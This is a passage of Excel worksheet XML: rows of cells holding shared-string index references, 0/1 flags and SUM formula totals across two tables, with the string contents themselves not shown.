      </c>
      <c r="E50">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>414</v>
      </c>
      <c r="G50">
        <v>1</v>
      </c>
      <c r="H50">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A51" s="3" t="s">
        <v>459</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>460</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>518</v>
      </c>
      <c r="D51">
        <v>1</v>
      </c>
      <c r="E51">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>460</v>
      </c>
      <c r="G51">
        <v>1</v>
      </c>
      <c r="H51">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A52" s="3" t="s">
        <v>461</v>
      </c>
      <c r="B52" s="3"/>
      <c r="C52" s="3"/>
      <c r="F52" s="3"/>
    </row>
    <row r="53" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>462</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>463</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>463</v>
      </c>
      <c r="D53">
        <v>1</v>
      </c>
      <c r="E53">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>463</v>
      </c>
      <c r="G53">
        <v>1</v>
      </c>
      <c r="H53">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>465</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>465</v>
      </c>
      <c r="D54">
        <v>1</v>
      </c>
      <c r="E54">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>465</v>
      </c>
      <c r="G54">
        <v>1</v>
      </c>
      <c r="H54">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>466</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>467</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>467</v>
      </c>
      <c r="D55">
        <v>1</v>
      </c>
      <c r="E55">
        <v>1</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>467</v>
      </c>
      <c r="G55">
        <v>1</v>
      </c>
      <c r="H55">
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>468</v>
      </c>
      <c r="B56" s="3" t="s">
        <v>469</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>519</v>
      </c>
      <c r="D56">
        <v>1</v>
      </c>
      <c r="E56">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>469</v>
      </c>
      <c r="G56">
        <v>1</v>
      </c>
      <c r="H56">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A57" s="3" t="s">
        <v>470</v>
      </c>
      <c r="B57" s="3"/>
      <c r="C57" s="3"/>
      <c r="F57" s="3"/>
    </row>
    <row r="58" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A58" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B58" s="3" t="s">
        <v>472</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>520</v>
      </c>
      <c r="D58">
        <v>1</v>
      </c>
      <c r="E58">
        <v>1</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G58">
        <v>1</v>
      </c>
      <c r="H58">
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A59" s="3" t="s">
        <v>473</v>
      </c>
      <c r="B59" s="3"/>
      <c r="C59" s="3"/>
      <c r="F59" s="3"/>
    </row>
    <row r="60" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A60" s="3" t="s">
        <v>474</v>
      </c>
      <c r="B60" s="3" t="s">
        <v>475</v>
      </c>
      <c r="C60" s="3" t="s">
        <v>475</v>
      </c>
      <c r="D60">
        <v>1</v>
      </c>
      <c r="E60">
        <v>1</v>
      </c>
      <c r="F60" s="3" t="s">
        <v>475</v>
      </c>
      <c r="G60">
        <v>1</v>
      </c>
      <c r="H60">
        <v>1</v>
      </c>
    </row>
    <row r="61" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A61" s="3" t="s">
        <v>476</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>477</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>521</v>
      </c>
      <c r="D61">
        <v>1</v>
      </c>
      <c r="E61">
        <v>1</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>539</v>
      </c>
      <c r="G61">
        <v>1</v>
      </c>
      <c r="H61">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A62" s="3" t="s">
        <v>478</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>479</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>522</v>
      </c>
      <c r="D62">
        <v>1</v>
      </c>
      <c r="E62">
        <v>1</v>
      </c>
      <c r="F62" s="3" t="s">
        <v>479</v>
      </c>
      <c r="G62">
        <v>1</v>
      </c>
      <c r="H62">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A63" s="3" t="s">
        <v>480</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>481</v>
      </c>
      <c r="C63" s="3" t="s">
        <v>481</v>
      </c>
      <c r="D63">
        <v>1</v>
      </c>
      <c r="E63">
        <v>1</v>
      </c>
      <c r="F63" s="3" t="s">
        <v>481</v>
      </c>
      <c r="G63">
        <v>1</v>
      </c>
      <c r="H63">
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A64" s="3" t="s">
        <v>482</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>483</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>523</v>
      </c>
      <c r="D64">
        <v>0</v>
      </c>
      <c r="E64">
        <v>0</v>
      </c>
      <c r="F64" s="3" t="s">
        <v>483</v>
      </c>
      <c r="G64">
        <v>1</v>
      </c>
      <c r="H64">
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A65" s="3" t="s">
        <v>484</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>485</v>
      </c>
      <c r="C65" s="3" t="s">
        <v>524</v>
      </c>
      <c r="D65">
        <v>1</v>
      </c>
      <c r="E65">
        <v>1</v>
      </c>
      <c r="F65" s="3" t="s">
        <v>540</v>
      </c>
      <c r="G65">
        <v>1</v>
      </c>
      <c r="H65">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A66" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C66" s="3" t="s">
        <v>115</v>
      </c>
      <c r="D66">
        <v>0</v>
      </c>
      <c r="E66">
        <v>0</v>
      </c>
      <c r="F66" s="3" t="s">
        <v>116</v>
      </c>
      <c r="G66">
        <v>0</v>
      </c>
      <c r="H66">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A67" s="3" t="s">
        <v>486</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>477</v>
      </c>
      <c r="C67" s="3" t="s">
        <v>521</v>
      </c>
      <c r="D67">
        <v>1</v>
      </c>
      <c r="E67">
        <v>1</v>
      </c>
      <c r="F67" s="3" t="s">
        <v>539</v>
      </c>
      <c r="G67">
        <v>1</v>
      </c>
      <c r="H67">
        <v>1</v>
      </c>
    </row>
    <row r="68" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A68" s="3" t="s">
        <v>487</v>
      </c>
      <c r="B68" s="3" t="s">
        <v>488</v>
      </c>
      <c r="C68" s="3" t="s">
        <v>525</v>
      </c>
      <c r="D68">
        <v>1</v>
      </c>
      <c r="E68">
        <v>1</v>
      </c>
      <c r="F68" s="3" t="s">
        <v>525</v>
      </c>
      <c r="G68">
        <v>1</v>
      </c>
      <c r="H68">
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A69" s="3" t="s">
        <v>489</v>
      </c>
      <c r="B69" s="3" t="s">
        <v>490</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>526</v>
      </c>
      <c r="D69">
        <v>1</v>
      </c>
      <c r="E69">
        <v>0</v>
      </c>
      <c r="F69" s="3" t="s">
        <v>541</v>
      </c>
      <c r="G69">
        <v>1</v>
      </c>
      <c r="H69">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A70" s="3" t="s">
        <v>491</v>
      </c>
      <c r="B70" s="3"/>
      <c r="C70" s="3"/>
      <c r="F70" s="3"/>
    </row>
    <row r="71" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A71" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B71" s="3" t="s">
        <v>472</v>
      </c>
      <c r="C71" s="3" t="s">
        <v>520</v>
      </c>
      <c r="D71">
        <v>1</v>
      </c>
      <c r="E71">
        <v>1</v>
      </c>
      <c r="F71" s="3" t="s">
        <v>472</v>
      </c>
      <c r="G71">
        <v>1</v>
      </c>
      <c r="H71">
        <v>1</v>
      </c>
    </row>
    <row r="72" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A72" s="3" t="s">
        <v>492</v>
      </c>
      <c r="B72" s="3"/>
      <c r="C72" s="3"/>
      <c r="F72" s="3"/>
    </row>
    <row r="73" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A73" s="3" t="s">
        <v>435</v>
      </c>
      <c r="B73" s="3" t="s">
        <v>436</v>
      </c>
      <c r="C73" s="3" t="s">
        <v>436</v>
      </c>
      <c r="D73">
        <v>1</v>
      </c>
      <c r="E73">
        <v>1</v>
      </c>
      <c r="F73" s="3" t="s">
        <v>436</v>
      </c>
      <c r="G73">
        <v>1</v>
      </c>
      <c r="H73">
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A74" s="3" t="s">
        <v>493</v>
      </c>
      <c r="B74" s="3" t="s">
        <v>494</v>
      </c>
      <c r="C74" s="3" t="s">
        <v>527</v>
      </c>
      <c r="D74">
        <v>0</v>
      </c>
      <c r="E74">
        <v>0</v>
      </c>
      <c r="F74" s="3" t="s">
        <v>542</v>
      </c>
      <c r="G74">
        <v>1</v>
      </c>
      <c r="H74">
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A75" s="3" t="s">
        <v>495</v>
      </c>
      <c r="B75" s="3" t="s">
        <v>477</v>
      </c>
      <c r="C75" s="3" t="s">
        <v>521</v>
      </c>
      <c r="D75">
        <v>1</v>
      </c>
      <c r="E75">
        <v>1</v>
      </c>
      <c r="F75" s="3" t="s">
        <v>539</v>
      </c>
      <c r="G75">
        <v>1</v>
      </c>
      <c r="H75">
        <v>1</v>
      </c>
    </row>
    <row r="76" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A76" s="3" t="s">
        <v>496</v>
      </c>
      <c r="B76" s="3" t="s">
        <v>454</v>
      </c>
      <c r="C76" s="3" t="s">
        <v>528</v>
      </c>
      <c r="D76">
        <v>0</v>
      </c>
      <c r="E76">
        <v>0</v>
      </c>
      <c r="F76" s="3" t="s">
        <v>543</v>
      </c>
      <c r="G76">
        <v>1</v>
      </c>
      <c r="H76">
        <v>1</v>
      </c>
    </row>
    <row r="77" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A77" s="3" t="s">
        <v>497</v>
      </c>
      <c r="B77" s="3" t="s">
        <v>498</v>
      </c>
      <c r="C77" s="3" t="s">
        <v>529</v>
      </c>
      <c r="D77">
        <v>0</v>
      </c>
      <c r="E77">
        <v>0</v>
      </c>
      <c r="F77" s="3" t="s">
        <v>498</v>
      </c>
      <c r="G77">
        <v>1</v>
      </c>
      <c r="H77">
        <v>1</v>
      </c>
    </row>
    <row r="78" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A78" s="3" t="s">
        <v>499</v>
      </c>
      <c r="B78" s="3" t="s">
        <v>500</v>
      </c>
      <c r="C78" s="3" t="s">
        <v>500</v>
      </c>
      <c r="D78">
        <v>1</v>
      </c>
      <c r="E78">
        <v>1</v>
      </c>
      <c r="F78" s="3" t="s">
        <v>544</v>
      </c>
      <c r="G78">
        <v>0</v>
      </c>
      <c r="H78">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A79" s="3" t="s">
        <v>497</v>
      </c>
      <c r="B79" s="3" t="s">
        <v>498</v>
      </c>
      <c r="C79" s="3" t="s">
        <v>529</v>
      </c>
      <c r="D79">
        <v>0</v>
      </c>
      <c r="E79">
        <v>0</v>
      </c>
      <c r="F79" s="3" t="s">
        <v>498</v>
      </c>
      <c r="G79">
        <v>1</v>
      </c>
      <c r="H79">
        <v>1</v>
      </c>
    </row>
    <row r="80" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A80" s="3" t="s">
        <v>501</v>
      </c>
      <c r="B80" s="3"/>
      <c r="C80" s="3"/>
      <c r="F80" s="3"/>
    </row>
    <row r="81" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A81" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D81" s="6">
        <f>SUM(D4:D79)</f>
        <v>60</v>
      </c>
      <c r="E81" s="6">
        <f t="shared" ref="E81:H81" si="0">SUM(E4:E79)</f>
        <v>50</v>
      </c>
      <c r="F81" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G81" s="6">
        <f t="shared" si="0"/>
        <v>62</v>
      </c>
      <c r="H81" s="6">
        <f t="shared" si="0"/>
        <v>50</v>
      </c>
    </row>
    <row r="84" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A84" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B84" s="25"/>
      <c r="C84" s="25"/>
      <c r="D84" s="25"/>
      <c r="E84" s="25"/>
      <c r="F84" s="25"/>
      <c r="G84" s="25"/>
      <c r="H84" s="25"/>
    </row>
    <row r="85" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A85" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B85" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C85" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D85" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E85" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F85" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G85" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H85" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="86" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A86" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B86" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C86" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D86">
        <v>1</v>
      </c>
      <c r="E86">
        <v>1</v>
      </c>
      <c r="F86" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G86" s="19">
        <v>1</v>
      </c>
      <c r="H86" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="87" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A87" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B87" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C87" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D87">
        <v>1</v>
      </c>
      <c r="E87">
        <v>1</v>
      </c>
      <c r="F87" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G87" s="19">
        <v>1</v>
      </c>
      <c r="H87" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="88" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A88" s="3" t="s">
        <v>1543</v>
      </c>
      <c r="B88" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="C88" s="3" t="s">
        <v>1336</v>
      </c>
      <c r="D88">
        <v>1</v>
      </c>
      <c r="E88">
        <v>1</v>
      </c>
      <c r="F88" s="3" t="s">
        <v>1336</v>
      </c>
      <c r="G88" s="19">
        <v>1</v>
      </c>
      <c r="H88" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="89" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A89" s="3"/>
      <c r="B89" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="C89" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="D89" s="19">
        <v>1</v>
      </c>
      <c r="E89" s="19">
        <v>1</v>
      </c>
      <c r="F89" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="G89" s="19">
        <v>1</v>
      </c>
      <c r="H89" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="90" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A90" s="3"/>
      <c r="B90" s="3" t="s">
        <v>1062</v>
      </c>
      <c r="C90" s="3" t="s">
        <v>1062</v>
      </c>
      <c r="D90" s="19">
        <v>1</v>
      </c>
      <c r="E90" s="19">
        <v>1</v>
      </c>
      <c r="F90" s="3" t="s">
        <v>1062</v>
      </c>
      <c r="G90" s="19">
        <v>1</v>
      </c>
      <c r="H90" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="91" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A91" s="3"/>
      <c r="B91" s="3" t="s">
        <v>1295</v>
      </c>
      <c r="C91" s="3" t="s">
        <v>1295</v>
      </c>
      <c r="D91" s="19">
        <v>1</v>
      </c>
      <c r="E91" s="19">
        <v>1</v>
      </c>
      <c r="F91" s="3" t="s">
        <v>1295</v>
      </c>
      <c r="G91" s="19">
        <v>1</v>
      </c>
      <c r="H91" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="92" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A92" s="3" t="s">
        <v>1544</v>
      </c>
      <c r="B92" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="C92" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="D92">
        <v>1</v>
      </c>
      <c r="E92">
        <v>1</v>
      </c>
      <c r="F92" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="G92" s="19">
        <v>1</v>
      </c>
      <c r="H92" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="93" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A93" s="3" t="s">
        <v>1545</v>
      </c>
      <c r="B93" s="3" t="s">
        <v>1546</v>
      </c>
      <c r="C93" s="3" t="s">
        <v>1547</v>
      </c>
      <c r="D93">
        <v>1</v>
      </c>
      <c r="E93">
        <v>1</v>
      </c>
      <c r="F93" s="3" t="s">
        <v>1577</v>
      </c>
      <c r="G93" s="19">
        <v>1</v>
      </c>
      <c r="H93" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="94" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A94" s="3" t="s">
        <v>1548</v>
      </c>
      <c r="B94" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="C94" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="D94">
        <v>1</v>
      </c>
      <c r="E94">
        <v>1</v>
      </c>
      <c r="F94" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="G94" s="19">
        <v>1</v>
      </c>
      <c r="H94" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="95" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A95" s="3" t="s">
        <v>1271</v>
      </c>
      <c r="B95" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C95" s="3" t="s">
        <v>1272</v>
      </c>
      <c r="D95">
        <v>0</v>
      </c>
      <c r="E95">
        <v>0</v>
      </c>
      <c r="F95" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G95">
        <v>1</v>
      </c>
      <c r="H95">
        <v>1</v>
      </c>
    </row>
    <row r="96" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A96" s="3" t="s">
        <v>1273</v>
      </c>
      <c r="B96" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C96" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D96">
        <v>1</v>
      </c>
      <c r="E96">
        <v>1</v>
      </c>
      <c r="F96" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G96">
        <v>1</v>
      </c>
      <c r="H96">
        <v>1</v>
      </c>
    </row>
    <row r="97" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A97" s="3" t="s">
        <v>1549</v>
      </c>
      <c r="B97" s="3" t="s">
        <v>1032</v>
      </c>
      <c r="C97" s="3" t="s">
        <v>1075</v>
      </c>
      <c r="D97">
        <v>1</v>
      </c>
      <c r="E97">
        <v>1</v>
      </c>
      <c r="F97" s="3" t="s">
        <v>1084</v>
      </c>
      <c r="G97">
        <v>1</v>
      </c>
      <c r="H97">
        <v>1</v>
      </c>
    </row>
    <row r="98" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A98" s="3" t="s">
        <v>1146</v>
      </c>
      <c r="B98" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C98" s="3" t="s">
        <v>1165</v>
      </c>
      <c r="D98">
        <v>1</v>
      </c>
      <c r="E98">
        <v>1</v>
      </c>
      <c r="F98" s="3" t="s">
        <v>1173</v>
      </c>
      <c r="G98">
        <v>1</v>
      </c>
      <c r="H98">
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A99" s="3" t="s">
        <v>1550</v>
      </c>
      <c r="B99" s="3" t="s">
        <v>1551</v>
      </c>
      <c r="C99" s="3" t="s">
        <v>1552</v>
      </c>
      <c r="D99">
        <v>1</v>
      </c>
      <c r="E99">
        <v>1</v>
      </c>
      <c r="F99" s="3" t="s">
        <v>1578</v>
      </c>
      <c r="G99">
        <v>1</v>
      </c>
      <c r="H99">
        <v>1</v>
      </c>
    </row>
    <row r="100" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A100" s="3" t="s">
        <v>1553</v>
      </c>
      <c r="B100" s="3" t="s">
        <v>1554</v>
      </c>
      <c r="C100" s="3" t="s">
        <v>1555</v>
      </c>
      <c r="D100">
        <v>1</v>
      </c>
      <c r="E100">
        <v>1</v>
      </c>
      <c r="F100" s="3" t="s">
        <v>1579</v>
      </c>
      <c r="G100">
        <v>1</v>
      </c>
      <c r="H100">
        <v>1</v>
      </c>
    </row>
    <row r="101" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A101" s="3" t="s">
        <v>1556</v>
      </c>
      <c r="B101" s="3" t="s">
        <v>1557</v>
      </c>
      <c r="C101" s="3" t="s">
        <v>1558</v>
      </c>
      <c r="D101">
        <v>1</v>
      </c>
      <c r="E101">
        <v>1</v>
      </c>
      <c r="F101" s="3" t="s">
        <v>1580</v>
      </c>
      <c r="G101">
        <v>1</v>
      </c>
      <c r="H101">
        <v>1</v>
      </c>
    </row>
    <row r="102" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A102" s="3"/>
      <c r="B102" s="3" t="s">
        <v>1588</v>
      </c>
      <c r="C102" s="3" t="s">
        <v>1588</v>
      </c>
      <c r="D102" s="19">
        <v>1</v>
      </c>
      <c r="E102" s="19">
        <v>1</v>
      </c>
      <c r="F102" s="3" t="s">
        <v>1588</v>
      </c>
      <c r="G102" s="19">
        <v>1</v>
      </c>
      <c r="H102" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="103" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A103" s="3" t="s">
        <v>1559</v>
      </c>
      <c r="B103" s="3" t="s">
        <v>1589</v>
      </c>
      <c r="C103" s="3" t="s">
        <v>1590</v>
      </c>
      <c r="D103">
        <v>1</v>
      </c>
      <c r="E103">
        <v>1</v>
      </c>
      <c r="F103" s="3" t="s">
        <v>1589</v>
      </c>
      <c r="G103">
        <v>1</v>
      </c>
      <c r="H103">
        <v>1</v>
      </c>
    </row>
    <row r="104" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A104" s="3" t="s">
        <v>1560</v>
      </c>
      <c r="B104" s="3" t="s">
        <v>1561</v>
      </c>
      <c r="C104" s="3" t="s">
        <v>1562</v>
      </c>
      <c r="D104">
        <v>0</v>
      </c>
      <c r="E104">
        <v>0</v>
      </c>
      <c r="F104" s="3" t="s">
        <v>1581</v>
      </c>
      <c r="G104">
        <v>1</v>
      </c>
      <c r="H104">
        <v>1</v>
      </c>
    </row>
    <row r="105" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A105" s="3" t="s">
        <v>1563</v>
      </c>
      <c r="B105" s="3" t="s">
        <v>1564</v>
      </c>
      <c r="C105" s="3" t="s">
        <v>1565</v>
      </c>
      <c r="D105">
        <v>1</v>
      </c>
      <c r="E105">
        <v>1</v>
      </c>
      <c r="F105" s="3" t="s">
        <v>1582</v>
      </c>
      <c r="G105">
        <v>1</v>
      </c>
      <c r="H105">
        <v>1</v>
      </c>
    </row>
    <row r="106" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A106" s="3" t="s">
        <v>1566</v>
      </c>
      <c r="B106" s="3" t="s">
        <v>1567</v>
      </c>
      <c r="C106" s="3" t="s">
        <v>1568</v>
      </c>
      <c r="D106">
        <v>0</v>
      </c>
      <c r="E106">
        <v>0</v>
      </c>
      <c r="F106" s="3" t="s">
        <v>1583</v>
      </c>
      <c r="G106">
        <v>1</v>
      </c>
      <c r="H106">
        <v>1</v>
      </c>
    </row>
    <row r="107" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A107" s="3" t="s">
        <v>1569</v>
      </c>
      <c r="B107" s="3" t="s">
        <v>1393</v>
      </c>
      <c r="C107" s="3" t="s">
        <v>1393</v>
      </c>
      <c r="D107">
        <v>1</v>
      </c>
      <c r="E107">
        <v>1</v>
      </c>
      <c r="F107" s="3" t="s">
        <v>1393</v>
      </c>
      <c r="G107">
        <v>1</v>
      </c>
      <c r="H107">
        <v>1</v>
      </c>
    </row>
    <row r="108" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A108" s="3" t="s">
        <v>1570</v>
      </c>
      <c r="B108" s="3" t="s">
        <v>1571</v>
      </c>
      <c r="C108" s="3" t="s">
        <v>1572</v>
      </c>
      <c r="D108">
        <v>0</v>
      </c>
      <c r="E108">
        <v>0</v>
      </c>
      <c r="F108" s="3" t="s">
        <v>1584</v>
      </c>
      <c r="G108">
        <v>1</v>
      </c>
      <c r="H108">
        <v>1</v>
      </c>
    </row>
    <row r="109" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A109" s="3" t="s">
        <v>1479</v>
      </c>
      <c r="B109" s="3" t="s">
        <v>71</v>
      </c>
      <c r="C109" s="3" t="s">
        <v>71</v>
      </c>
      <c r="D109">
        <v>1</v>
      </c>
      <c r="E109">
        <v>1</v>
      </c>
      <c r="F109" s="3" t="s">
        <v>1915</v>
      </c>
      <c r="G109">
        <v>0</v>
      </c>
      <c r="H109">
        <v>0</v>
      </c>
    </row>
    <row r="110" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A110" s="3" t="s">
        <v>1573</v>
      </c>
      <c r="B110" s="3" t="s">
        <v>1055</v>
      </c>
      <c r="C110" s="3" t="s">
        <v>1080</v>
      </c>
      <c r="D110">
        <v>1</v>
      </c>
      <c r="E110">
        <v>1</v>
      </c>
      <c r="F110" s="3" t="s">
        <v>1914</v>
      </c>
      <c r="G110">
        <v>0</v>
      </c>
      <c r="H110">
        <v>0</v>
      </c>
    </row>
    <row r="111" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A111" s="3" t="s">
        <v>73</v>
      </c>
      <c r="B111" s="3" t="s">
        <v>73</v>
      </c>
      <c r="C111" s="3" t="s">
        <v>73</v>
      </c>
      <c r="D111">
        <v>1</v>
      </c>
      <c r="E111">
        <v>1</v>
      </c>
      <c r="F111" s="3" t="s">
        <v>1585</v>
      </c>
      <c r="G111">
        <v>0</v>
      </c>
      <c r="H111">
        <v>0</v>
      </c>
    </row>
    <row r="112" spans="1:8" ht="118.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A112" s="3" t="s">
        <v>1574</v>
      </c>
      <c r="B112" s="3" t="s">
        <v>1575</v>
      </c>
      <c r="C112" s="3" t="s">
        <v>1576</v>
      </c>
      <c r="D112">
        <v>0</v>
      </c>
      <c r="E112">
        <v>0</v>
      </c>
      <c r="F112" s="3" t="s">
        <v>1586</v>
      </c>
      <c r="G112">
        <v>0</v>
      </c>
      <c r="H112">
        <v>0</v>
      </c>
    </row>
    <row r="113" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A113" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D113" s="6">
        <f>SUM(D86:D112)</f>
        <v>22</v>
      </c>
      <c r="E113" s="6">
        <f t="shared" ref="E113:H113" si="1">SUM(E86:E112)</f>
        <v>22</v>
      </c>
      <c r="F113" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G113" s="6">
